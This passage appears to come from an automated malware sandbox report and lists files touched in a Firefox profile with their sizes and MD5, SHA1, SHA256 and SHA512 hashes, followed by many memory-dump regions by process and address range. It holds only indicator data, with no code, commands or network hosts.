                              d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                              SHA512

                              d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                              Filesize

                              116B

                              MD5

                              2a461e9eb87fd1955cea740a3444ee7a

                              SHA1

                              b10755914c713f5a4677494dbe8a686ed458c3c5

                              SHA256

                              4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                              SHA512

                              34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                              Filesize

                              372B

                              MD5

                              bf957ad58b55f64219ab3f793e374316

                              SHA1

                              a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                              SHA256

                              bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                              SHA512

                              79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                              Filesize

                              17.8MB

                              MD5

                              daf7ef3acccab478aaa7d6dc1c60f865

                              SHA1

                              f8246162b97ce4a945feced27b6ea114366ff2ad

                              SHA256

                              bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                              SHA512

                              5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

                              Filesize

                              12KB

                              MD5

                              cd47b7d02931eed1240da4439e6b8816

                              SHA1

                              8cab9d128880198779b7d140516ee7484ffa0579

                              SHA256

                              55e6d6de2dfc6872bfe1d4f65681710eacf4ad0bd6d8ddb7b164c40aac10e49c

                              SHA512

                              148895dc5cb2eb9c71786b19d92230a2070f21e3d07c0832dbcb0c3edf398596e3907d70369dcaf928423d111a173d6b9d330e3ffe82ecf971bb53492ba08adc

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

                              Filesize

                              10KB

                              MD5

                              e52c78cf680aa416e6b67592ba423b47

                              SHA1

                              d8a5394afb603b66effd88b39f43e87c229daf34

                              SHA256

                              76c065a60939c6d6f09da6753abad04c6ce149b3128e7c9bc329f4a52e13aefd

                              SHA512

                              cb87ec4c0d52b265d50b1feed642e97c5d798167cb95cea048f7402d2052209eed793b0b39b2650ac68d329310af87af7a7002afb612298dac66850b0777347a

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

                              Filesize

                              15KB

                              MD5

                              658444196dcdf57783fb700f53c7ca05

                              SHA1

                              7814c323463a7b8e31d061d8f519786a557d0593

                              SHA256

                              74e485e5ee47ed28ac28f8475f4728d52675d548b43db181a5afcbc0f2a37a4c

                              SHA512

                              9c46b1fae9929a48f2d7186eb0df39276603032db1952e6534e980e9c67153b1be033c42915eceb4d042d362d2639edb736b086e4c80e10745d9817bc1b21250

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs.js

                              Filesize

                              11KB

                              MD5

                              7942b7eb9b0f44839b32ee0e2e128fff

                              SHA1

                              f5bc2f5e8969ece3f2381e18e3e2c31fcf2e0fdb

                              SHA256

                              2e46189d385f137769ceb8ff6bdfa3e1e115f3ca23470cc8c8b6ffd9274d5c95

                              SHA512

                              56a0d5359c7e00024fc4ed1c71b26c97a491f7f8c1fced4ecf66afb5e086a2829d770dd8d72898cbf06d0db5c29230a23c55ca79c88a7f6e75b64746b8ebc51e

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs.js

                              Filesize

                              10KB

                              MD5

                              424cd6fb5673bf9af8a30e687a2b1e80

                              SHA1

                              117cefbc47b6a17fc97faa8e279d52cfd0228a78

                              SHA256

                              4bff5f12817f2c4ab4814aa9f04e3f8c68b45f3f628154b0b1e52743712a5147

                              SHA512

                              b132490bed164d224475d7eeb6c1e246efb885f011336e6b2f46f1aa268c39a309cdc7f8465be6d4e93af01aa8bc95264bbfb1a7d7fde1c1bb4d5e27bfb1f139

                            • memory/60-68-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-84-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-81-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-83-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-73-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-85-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-133-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-90-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-91-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-86-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-82-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-75-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-163-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-98-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-171-0x0000000000CC0000-0x000000000111E000-memory.dmp

                              Filesize

                              4.4MB

                            • memory/60-155-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-87-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-80-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-92-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-69-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-70-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-71-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-72-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-74-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-59-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-128-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-100-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-99-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/60-153-0x0000000000400000-0x0000000000675000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/208-279-0x0000000000120000-0x00000000005AB000-memory.dmp

                              Filesize

                              4.5MB

                            • memory/208-277-0x0000000000120000-0x00000000005AB000-memory.dmp

                              Filesize

                              4.5MB

                            • memory/208-247-0x0000000000120000-0x00000000005AB000-memory.dmp

                              Filesize

                              4.5MB

                            • memory/224-204-0x0000000000100000-0x000000000041A000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/224-33-0x0000000000100000-0x000000000041A000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/224-76-0x0000000000100000-0x000000000041A000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/224-113-0x0000000000100000-0x000000000041A000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/548-222-0x0000000000720000-0x0000000000DB3000-memory.dmp

                              Filesize

                              6.6MB

                            • memory/548-182-0x0000000000720000-0x0000000000DB3000-memory.dmp

                              Filesize

                              6.6MB

                            • memory/860-41-0x0000000000100000-0x000000000041A000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/860-42-0x0000000000100000-0x000000000041A000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/924-249-0x0000000000B20000-0x0000000001764000-memory.dmp

                              Filesize

                              12.3MB

                            • memory/924-269-0x0000000000B20000-0x0000000001764000-memory.dmp

                              Filesize

                              12.3MB

                            • memory/924-201-0x0000000000B20000-0x0000000001764000-memory.dmp

                              Filesize

                              12.3MB

                            • memory/1592-300-0x0000000005C10000-0x00000000061B4000-memory.dmp

                              Filesize

                              5.6MB

                            • memory/1592-299-0x0000000005070000-0x000000000521A000-memory.dmp

                              Filesize

                              1.7MB

                            • memory/1592-298-0x0000000004FE0000-0x0000000005002000-memory.dmp

                              Filesize

                              136KB

                            • memory/1592-297-0x0000000004F50000-0x0000000004FDC000-memory.dmp

                              Filesize

                              560KB

                            • memory/1592-296-0x0000000005370000-0x0000000005660000-memory.dmp

                              Filesize

                              2.9MB

                            • memory/1592-295-0x0000000000FB0000-0x0000000000FB8000-memory.dmp

                              Filesize

                              32KB

                            • memory/1608-231-0x0000000000F40000-0x0000000001200000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/1608-173-0x0000000000F40000-0x0000000001200000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/1608-115-0x0000000000F40000-0x0000000001200000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/1608-205-0x0000000000F40000-0x0000000001200000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/1608-172-0x0000000000F40000-0x0000000001200000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/1836-331-0x0000000004D90000-0x0000000004E1C000-memory.dmp

                              Filesize

                              560KB

                            • memory/1836-335-0x0000000004FD0000-0x000000000517A000-memory.dmp

                              Filesize

                              1.7MB

                            • memory/1836-327-0x0000000002960000-0x000000000296A000-memory.dmp

                              Filesize

                              40KB

                            • memory/1836-322-0x0000000002920000-0x000000000294E000-memory.dmp

                              Filesize

                              184KB

                            • memory/2044-134-0x0000000000890000-0x0000000000896000-memory.dmp

                              Filesize

                              24KB

                            • memory/2044-132-0x00000000001C0000-0x00000000001D4000-memory.dmp

                              Filesize

                              80KB

                            • memory/2108-178-0x0000000000050000-0x00000000006E3000-memory.dmp

                              Filesize

                              6.6MB

                            • memory/2108-184-0x0000000000050000-0x00000000006E3000-memory.dmp

                              Filesize

                              6.6MB

                            • memory/2124-185-0x0000000000400000-0x0000000000408000-memory.dmp

                              Filesize

                              32KB

                            • memory/2380-411-0x00000000000B0000-0x000000000052F000-memory.dmp

                              Filesize

                              4.5MB

                            • memory/2380-369-0x00000000000B0000-0x000000000052F000-memory.dmp

                              Filesize

                              4.5MB

                            • memory/2516-1266-0x0000000000690000-0x0000000000950000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/2516-1285-0x0000000000690000-0x0000000000950000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/2516-448-0x0000000000690000-0x0000000000950000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/2516-457-0x0000000000690000-0x0000000000950000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/2516-456-0x0000000000690000-0x0000000000950000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/2972-371-0x0000000000F60000-0x0000000001BF2000-memory.dmp

                              Filesize

                              12.6MB

                            • memory/2972-353-0x0000000000F60000-0x0000000001BF2000-memory.dmp

                              Filesize

                              12.6MB

                            • memory/2972-267-0x0000000000F60000-0x0000000001BF2000-memory.dmp

                              Filesize

                              12.6MB

                            • memory/3140-388-0x0000000000210000-0x00000000008A3000-memory.dmp

                              Filesize

                              6.6MB

                            • memory/3140-390-0x0000000000210000-0x00000000008A3000-memory.dmp

                              Filesize

                              6.6MB

                            • memory/3164-424-0x0000000000110000-0x00000000007A3000-memory.dmp

                              Filesize

                              6.6MB

                            • memory/3164-419-0x0000000000110000-0x00000000007A3000-memory.dmp

                              Filesize

                              6.6MB

                            • memory/3324-227-0x0000000000DF0000-0x00000000010B0000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/3324-275-0x0000000000DF0000-0x00000000010B0000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/3324-228-0x0000000000DF0000-0x00000000010B0000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/3324-224-0x0000000000DF0000-0x00000000010B0000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/3324-270-0x0000000000DF0000-0x00000000010B0000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/3372-1246-0x00000000008E0000-0x0000000000BA0000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/3372-405-0x00000000008E0000-0x0000000000BA0000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/3372-404-0x00000000008E0000-0x0000000000BA0000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/3372-395-0x00000000008E0000-0x0000000000BA0000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/3372-1151-0x00000000008E0000-0x0000000000BA0000-memory.dmp

                              Filesize

                              2.8MB

                            • memory/3536-88-0x0000000000400000-0x00000000004E1000-memory.dmp

                              Filesize

                              900KB

                            • memory/3536-203-0x0000000000400000-0x00000000004E1000-memory.dmp

                              Filesize

                              900KB

                            • memory/3968-152-0x0000000073430000-0x000000007343E000-memory.dmp

                              Filesize

                              56KB

                            • memory/3968-151-0x0000000003670000-0x000000000367E000-memory.dmp

                              Filesize

                              56KB

                            • memory/4080-180-0x0000000000F40000-0x00000000013BF000-memory.dmp

                              Filesize

                              4.5MB

                            • memory/4080-39-0x0000000000F40000-0x00000000013BF000-memory.dmp

                              Filesize

                              4.5MB

                            • memory/4080-97-0x0000000000F40000-0x00000000013BF000-memory.dmp

                              Filesize

                              4.5MB

                            • memory/4080-114-0x0000000000F40000-0x00000000013BF000-memory.dmp

                              Filesize

                              4.5MB

                            • memory/5004-4740-0x0000000000100000-0x000000000041A000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/5044-21-0x00000000004A0000-0x00000000007BA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/5044-34-0x00000000004A0000-0x00000000007BA000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/5444-1323-0x00007FF788880000-0x00007FF788D10000-memory.dmp

                              Filesize

                              4.6MB

                            • memory/5444-1326-0x00007FF788880000-0x00007FF788D10000-memory.dmp

                              Filesize

                              4.6MB

                            • memory/5568-1336-0x0000023DB2A60000-0x0000023DB2A82000-memory.dmp

                              Filesize

                              136KB

                            • memory/5864-1338-0x0000000000100000-0x000000000041A000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/6208-1339-0x00007FF7B7680000-0x00007FF7B7B10000-memory.dmp

                              Filesize

                              4.6MB

                            • memory/6208-1353-0x00007FF7B7680000-0x00007FF7B7B10000-memory.dmp

                              Filesize

                              4.6MB

                            • memory/6440-1218-0x0000000004770000-0x0000000004842000-memory.dmp

                              Filesize

                              840KB

                            • memory/6440-1213-0x0000000004050000-0x0000000004068000-memory.dmp

                              Filesize

                              96KB

                            • memory/6440-1214-0x0000000004230000-0x0000000004280000-memory.dmp

                              Filesize

                              320KB

                            • memory/6440-1215-0x0000000004280000-0x00000000042B6000-memory.dmp

                              Filesize

                              216KB

                            • memory/6440-1216-0x0000000004590000-0x0000000004622000-memory.dmp

                              Filesize

                              584KB

                            • memory/6440-1217-0x00000000042C0000-0x0000000004301000-memory.dmp

                              Filesize

                              260KB

                            • memory/6540-1228-0x0000000002230000-0x0000000002248000-memory.dmp

                              Filesize

                              96KB

                            • memory/6540-1220-0x0000000000020000-0x00000000000B6000-memory.dmp

                              Filesize

                              600KB

                            • memory/6540-1221-0x000000001AB30000-0x000000001AB66000-memory.dmp

                              Filesize

                              216KB

                            • memory/6540-1223-0x000000001B150000-0x000000001B2FA000-memory.dmp

                              Filesize

                              1.7MB

                            • memory/6540-1222-0x000000001AF10000-0x000000001AF9C000-memory.dmp

                              Filesize

                              560KB

                            • memory/6540-1224-0x000000001C110000-0x000000001C296000-memory.dmp

                              Filesize

                              1.5MB

                            • memory/6540-1229-0x000000001AB90000-0x000000001ABA8000-memory.dmp

                              Filesize

                              96KB

                            • memory/6780-1252-0x00000000015D0000-0x0000000001611000-memory.dmp

                              Filesize

                              260KB